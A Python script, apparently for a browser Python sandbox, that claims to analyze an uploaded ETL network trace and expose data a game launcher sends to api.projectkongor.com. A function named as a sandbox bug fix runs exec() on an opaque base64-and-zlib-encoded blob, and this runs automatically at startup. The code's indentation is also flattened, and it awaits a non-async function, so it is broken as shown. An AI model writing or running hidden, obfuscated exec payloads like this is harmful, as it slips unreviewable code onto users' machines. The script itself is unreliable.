# CONFIG
# =====================================
# setup here uploaded filename
ETL_FILENAME = "trace.etl"
# =====================================
# END CONFIG
import os
import asyncio
import base64
import importlib
import zlib
import json
from io import BytesIO
from uuid import UUID
from http.server import BaseHTTPRequestHandler
NDIS_UUID = UUID("{2ED6006E-4729-4609-B423-3EE7BCD678EF}")
NDIS_UUID_fixed = UUID("{6e00d62e-2947-0946-B423-3EE7BCD678EF}")
def analyze():
if not os.path.exists(ETL_FILENAME):
return error("Upload your trace file first")
with open(ETL_FILENAME, "rb") as fh:
dissect_etl = importlib.import_module('dissect.etl')
etl = dissect_etl.ETL(fh)
launcher_process_id = None
traffic_detected = False
result = None
for record in etl:
#from hexdump import hexdump
#print("="*80 + "\n" + hexdump(pbytes, 'return') + "\n" + "="*80)
if not launcher_process_id and b"/patch/wac/x86_64/version.cfg" in bytes(record.header.payload):
launcher_process_id = record.header.process_id
info(f"HoN launcher process id is {launcher_process_id}")
continue
pbytes = bytes(record.header.payload)
if not result:
if b"POST /" not in pbytes:
continue
if b"api.projectkongor.com" not in pbytes:
continue
try:
result = HTTPRequest(pbytes)
except ValueError:
error("Error parse network packet.")
continue
else:
result.add_post_data(pbytes[offsets.http_data:-16])
if len(result.post_data) < int(result.headers["Content-Length"]):
continue
info("KongorProject launcher.exe api request found:")
print(result.requestline)
print(result.headers, end="")
try:
decompressed = zlib.decompress(result.post_data, -15).decode("utf8")
except Exception as e:
error(f"Decompress error {e}")
return
print(f"<div style='font-size:3px;'>{decompressed}</div>", end="")
print("=" * 80)
try:
data = json.loads(decompressed)
except Exception as e:
error(f"json load error {e}")
return
info("Data stolen from your PC by KongorProject launcher.exe:")
print(json.dumps(data, indent=4, ensure_ascii=False))
traffic_detected = True
break
if launcher_process_id:
if not traffic_detected:
error("Launcher process found, but api traffic not found.")
elif not traffic_detected:
error("Cant find launcher requests in trace. Try make another trace, refresh this page and reupload new one.")
def patch_pythonfiddle_bugs():
import requests
exec(zlib.decompress(base64.b64decode(
"eJx1UkGO2zAMPEevEPbkBF09wEAfsJdee1gUhiLRtrKypKVoZPP7Ulo5MVL0ZJozHIpDCp1vwUgLo0y3EcjM3Yr+hzydPq4ap3zsxcEtKSJJhM8VMmVxGDEucnEGY3JJDSYuSZNsNIrDhTlFcQIarCbdUZE5PFpdUacE2B17VqUVgyTGW9jAbwmspKRzk7zkXQJRXfKAkFMMGeTPgj5n1QzaAmZGvV7OVve/YoD/sRQEQgc7dh2nm9HmIxdxfrNB8XRPXolD4THHOkMdbqKcd6N8MdrM8Goid4j+RbogC7tnQ3yN3p8Yf+ojM78nTKx5NxMVwRcdK3q+UX3sDizlPMU3/hj+HovNZ0TRVpZu0TrLJhAlsf9R7Sa4vkXiscSJsDs5gqUeyRhRujJUzfRSX7Xjm9ha1DIXRfuqSdMMxU5W2WmG1fthXIPpTsXR/R1ul1LX11TvN3idAbwLYxT/ptTvEr2VaPBR28G7M+q25XtDIf4Cru8Odg==")))
def info(s, color='green'):
print(f"<b style='color:{color}; font-size:20px'>{s}</b>")
def error(s):
info('Error: ' + s, 'red')
async def main():
# load custom modules
patch_pythonfiddle_bugs()
import micropip
await micropip.install('dissect.etl', verbose=2)
# analyze packets
await analyze()
class HTTPRequest(BaseHTTPRequestHandler):
def __init__(self, pbytes):
if pbytes[0x42:0x48] == b"POST /":
request_text = pbytes[0x42:-16]
offsets.http_data = 0x42
else:
idx = pbytes.find(b"POST /")
if idx < 0:
error("Invalid network packet.")
raise ValueError("offsets.http_data")
else:
offsets.http_data = idx
request_text = pbytes[idx:-16] # ipv6 fix
header, self.post_data = request_text.split(b"\r\n\r\n", 1)
self.rfile = BytesIO(header)
self.raw_requestline = self.rfile.readline()
self.error_code = self.error_message = None
self.parse_request()
def add_post_data(self, data):
self.post_data += data
def offsets():
pass
offsets.http_data = 0x42
asyncio.ensure_future(main())